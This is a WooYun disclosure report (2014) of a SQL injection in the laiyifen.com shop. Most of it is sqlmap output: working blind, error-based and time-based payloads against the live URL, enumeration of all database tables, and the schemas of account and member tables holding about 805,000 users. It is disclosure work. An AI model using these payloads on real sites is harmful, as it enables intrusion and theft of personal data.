当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-083795

漏洞标题:来伊份官方商城某处SQL注入可致80W+用户数据泄露

相关厂商:laiyifen.com

漏洞作者: pandada

提交时间:2014-11-19 11:25

修复时间:2015-01-03 11:28

公开时间:2015-01-03 11:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-19: 细节已通知厂商并且等待厂商处理中
2014-11-19: 厂商已经确认,细节仅向厂商公开
2014-11-29: 细节向核心白帽子及相关领域专家公开
2014-12-09: 细节向普通白帽子公开
2014-12-19: 细节向实习白帽子公开
2015-01-03: 细节向公众公开

简要描述:

来伊份作为中国休闲食品连锁零售业的领导品牌,目前在上海、江苏、浙江等9个省、直辖市拥有近2400家专卖店,每年为近6000万人次提供优质食品。从1999年第一家门店开业起,来伊份陆续推出过炒货、肉制品等9大系列700多种食品。2013年销售额超过30亿,全国员工人数近1万名。“三好一公道”是来伊份的经营理念,即品质好、味道好、服务好和价格公道。

详细说明:

注入点说明:(星号部分为注入点)

GET /index.php/article-guanyuwomen-lists-1*.html HTTP/1.1
Referer: http://www.laiyifen.com:80/
Cookie: vary=d77f798a56ce90753573fc70c883ad591a94ee60638487365167a950e7783a9a; laiyifen_cookie=536871690.20480.0000; s=1e8737f4e245da0cab3df00d44c7437d; S[CART_COUNT]=0; S[CART_NUMBER]=0; S[CART_TOTAL_PRICE]=%EF%BF%A50.00; cart[go_back_link]=http%3A%2F%2Fwww.laiyifen.com%2F; ZDEDebuggerPresent=php,phtml,php3; MEMBER=-d41d8cd98f00b204e9800998ecf8427e-d41d8cd98f00b204e9800998ecf8427e-1415515310
Host: www.laiyifen.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

漏洞证明:

sqlmap identified the following injection points with a total of 235 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html
---
current user: 'laiyifendb@10.3.%.%'
current database: 'laiyifendb'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html
---
available databases [3]:
[*] information_schema
[*] laiyifendb
[*] test
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html
---
Database: laiyifendb
[176 tables]
+-----------------------------------------+
| app_default_info |
| awardlist |
| awardlist_copy |
| collect_shop |
| ds_0303_add |
| ds_0303_payment |
| ds_0303_ptype |
| ds_0303_rpcpoll |
| ds_ectools_analysis_logs |
| ds_ectools_analysis_logs_2 |
| ds_guajian_1 |
| luck_log |
| luck_log_mobile |
| member_lucknum |
| mobile_promotion_goods |
| moblie_luck_num |
| sdb_aftersales_return_product |
| sdb_authenticator_clients |
| sdb_authenticator_logs |
| sdb_authenticator_requestlist |
| sdb_b2c_bcompany |
| sdb_b2c_brand |
| sdb_b2c_cart |
| sdb_b2c_cart_objects |
| sdb_b2c_comment_goods_point |
| sdb_b2c_comment_goods_type |
| sdb_b2c_counter |
| sdb_b2c_counter_attach |
| sdb_b2c_coupons |
| sdb_b2c_delivery |
| sdb_b2c_delivery_items |
| sdb_b2c_dly_h_area |
| sdb_b2c_dlycorp |
| sdb_b2c_dlytype |
| sdb_b2c_ecpool |
| sdb_b2c_ecpool_mobile |
| sdb_b2c_excard_rule |
| sdb_b2c_excard_used |
| sdb_b2c_fbtad |
| sdb_b2c_goods |
| sdb_b2c_goods_cat |
| sdb_b2c_goods_keywords |
| sdb_b2c_goods_lv_price |
| sdb_b2c_goods_promotion_ref |
| sdb_b2c_goods_rate |
| sdb_b2c_goods_spec_index |
| sdb_b2c_goods_type |
| sdb_b2c_goods_type_props |
| sdb_b2c_goods_type_props_value |
| sdb_b2c_goods_type_spec |
| sdb_b2c_goods_virtual_cat |
| sdb_b2c_history_orders |
| sdb_b2c_history_products |
| sdb_b2c_huodong_log |
| sdb_b2c_huodongda |
| sdb_b2c_jiang |
| sdb_b2c_jiang_huodong |
| sdb_b2c_jiang_log |
| sdb_b2c_jiang_members |
| sdb_b2c_lulu_card |
| sdb_b2c_member_addrs |
| sdb_b2c_member_advance |
| sdb_b2c_member_comments |
| sdb_b2c_member_coupon |
| sdb_b2c_member_goods |
| sdb_b2c_member_lv |
| sdb_b2c_member_msg |
| sdb_b2c_member_point |
| sdb_b2c_member_pwdlog |
| sdb_b2c_member_systmpl |
| sdb_b2c_members |
| sdb_b2c_meng_buy_1 |
| sdb_b2c_meng_good_gift |
| sdb_b2c_meng_luck_reg |
| sdb_b2c_meng_send |
| sdb_b2c_order_coupon_user |
| sdb_b2c_order_delivery |
| sdb_b2c_order_items |
| sdb_b2c_order_log |
| sdb_b2c_order_objects |
| sdb_b2c_order_pmt |
| sdb_b2c_orders |
| sdb_b2c_products |
| sdb_b2c_recharge_log |
| sdb_b2c_reship |
| sdb_b2c_reship_items |
| sdb_b2c_sales_baifendian |
| sdb_b2c_sales_bangdingsp |
| sdb_b2c_sales_freeShipping |
| sdb_b2c_sales_rule_goods |
| sdb_b2c_sales_rule_order |
| sdb_b2c_sell_logs |
| sdb_b2c_shop |
| sdb_b2c_single |
| sdb_b2c_spec_values |
| sdb_b2c_specification |
| sdb_b2c_type_brand |
| sdb_b2copenapi_api_fail |
| sdb_b2copenapi_api_log |
| sdb_b2copenapi_api_log_copy |
| sdb_b2copenapi_api_mobile_logs |
| sdb_b2copenapi_request_shops |
| sdb_base_app_content |
| sdb_base_apps |
| sdb_base_cache_expires |
| sdb_base_files |
| sdb_base_kvstore |
| sdb_base_network |
| sdb_base_queue |
| sdb_base_rpcnotify |
| sdb_base_rpcpoll |
| sdb_base_task |
| sdb_content_article_bodys |
| sdb_content_article_indexs |
| sdb_content_article_nodes |
| sdb_couponlog_order_coupon_ref |
| sdb_couponlog_order_coupon_user |
| sdb_dbeav_meta_register |
| sdb_dbeav_meta_value_datetime |
| sdb_dbeav_meta_value_decimal |
| sdb_dbeav_meta_value_int |
| sdb_dbeav_meta_value_longtext |
| sdb_dbeav_meta_value_text |
| sdb_dbeav_meta_value_varchar |
| sdb_dbeav_recycle |
| sdb_desktop_filter |
| sdb_desktop_flow |
| sdb_desktop_hasrole |
| sdb_desktop_menus |
| sdb_desktop_recycle |
| sdb_desktop_role_flow |
| sdb_desktop_roles |
| sdb_desktop_tag |
| sdb_desktop_tag_rel |
| sdb_desktop_user_flow |
| sdb_desktop_users |
| sdb_ectools_analysis |
| sdb_ectools_analysis_logs |
| sdb_ectools_currency |
| sdb_ectools_order_bills |
| sdb_ectools_payments |
| sdb_ectools_refunds |
| sdb_ectools_regions |
| sdb_gift_cat |
| sdb_gift_ref |
| sdb_giftpackage_giftpackage |
| sdb_giftpackage_order_ref |
| sdb_image_image |
| sdb_image_image_attach |
| sdb_operatorlogmanage_logs |
| sdb_operatorlogmanage_register |
| sdb_pam_account |
| sdb_pam_auth |
| sdb_pam_log |
| sdb_pointprofessional_member_point_task |
| sdb_recommended_goods |
| sdb_recommended_goods_period |
| sdb_search_search |
| sdb_site_explorers |
| sdb_site_link |
| sdb_site_menus |
| sdb_site_modules |
| sdb_site_route_statics |
| sdb_site_seo |
| sdb_site_themes |
| sdb_site_themes_tmpl |
| sdb_site_widgets |
| sdb_site_widgets_instance |
| sdb_site_widgets_proinstance |
| sdb_timedbuy_objitems |
| shoplist |
| swjiang_contect |
| swjiang_contect_copy |
| tbasarea |
| tbaschildarea |
| tbasthirdarea |
+-----------------------------------------+


Database: laiyifendb
Table: sdb_pam_account
[9 columns]
+----------------+-----------------------+
| Column | Type |
+----------------+-----------------------+
| account_id | mediumint(8) unsigned |
| account_type | varchar(30) |
| createtime | int(10) unsigned |
| disabled | enum('true','false') |
| hmlogin | enum('false','true') |
| hmupdate | enum('0','1') |
| login_name | varchar(100) |
| login_password | varchar(32) |
| openlogin | varchar(60) |
+----------------+-----------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html
---
Database: laiyifendb
+-----------------+---------+
| Table | Entries |
+-----------------+---------+
| sdb_pam_account | 805856 |
+-----------------+---------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html
---
Database: laiyifendb
Table: sdb_b2c_members
[70 columns]
+----------------+-----------------------+
| Column | Type |
+----------------+-----------------------+
| addon | longtext |
| addr | varchar(255) |
| advance | decimal(20,3) |
| advance_freeze | decimal(20,3) |
| anyolife_uname | varchar(100) |
| area | varchar(255) |
| b_day | tinyint(3) unsigned |
| b_month | tinyint(3) unsigned |
| b_year | smallint(5) unsigned |
| bind_time | int(10) unsigned |
| biz_money | decimal(20,3) |
| card_no | varchar(20) |
| card_type | varchar(45) |
| cert_no | varchar(100) |
| cert_type | varchar(200) |
| cur | varchar(20) |
| custom | longtext |
| disabled | enum('true','false') |
| education | varchar(45) |
| email | varchar(200) |
| end_date | int(10) unsigned |
| experience | int(10) |
| family_mem | varchar(45) |
| fav_tags | longtext |
| firstname | varchar(50) |
| foreign_id | varchar(255) |
| interest | longtext |
| is_card | enum('0','1') |
| is_upload | enum('0','1') |
| job | varchar(200) |
| lang | varchar(20) |
| last_loginip | varchar(16) |
| last_logintime | int(10) unsigned |
| lastname | varchar(50) |
| login_count | int(11) |
| login_source | varchar(45) |
| member_id | mediumint(8) unsigned |
| member_lv_id | mediumint(8) unsigned |
| member_refer | varchar(50) |
| mobile | varchar(30) |
| month_income | varchar(45) |
| name | varchar(50) |
| nation | varchar(45) |
| order_num | mediumint(8) unsigned |
| pay_time | mediumint(8) unsigned |
| point | int(10) |
| point_freeze | mediumint(8) unsigned |
| point_history | mediumint(8) unsigned |
| refer_id | varchar(50) |
| refer_url | varchar(200) |
| reg_ip | varchar(16) |
| reg_source | varchar(45) |
| regtime | int(10) unsigned |
| remark | text |
| remark_type | varchar(2) |
| score_rate | decimal(5,3) |
| sex | enum('0','1','2') |
| state | tinyint(1) |
| sum_pointtotal | decimal(20,3) |
| tel | varchar(30) |
| unreadmsg | smallint(5) unsigned |
| use_total | decimal(20,3) |
| vipapply_no | varchar(45) |
| vipapply_time | int(10) unsigned |
| vipcard_no | varchar(45) |
| vipcard_pwd | varchar(45) |
| vipinfo_no | varchar(20) |
| vocation | varchar(50) |
| wedlock | enum('0','1') |
| zip | varchar(20) |
+----------------+-----------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html
---
Database: laiyifendb
+-----------------+---------+
| Table | Entries |
+-----------------+---------+
| sdb_b2c_members | 805876 |
+-----------------+---------+


具体数据我就不dump了。

修复方案:

加强参数过滤。

版权声明:转载请注明来源 pandada@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2014-11-19 17:20

厂商回复:

非常感谢乌云和pandada的支持,非常感谢!

最新状态:

暂无


漏洞评价:

评论

  1. 2014-11-19 17:59 | pandada ( 实习白帽子 | Rank:91 漏洞数:20 | To be a warrior is not a simple matter o...)

    咋就不能给高点分呢,我还是路人,友情多给点也好呀,亲

  2. 2014-11-20 09:26 | 紫衣大侠 ( 普通白帽子 | Rank:201 漏洞数:21 | 愿结天下有识之士)

    还有一处没修哦~~~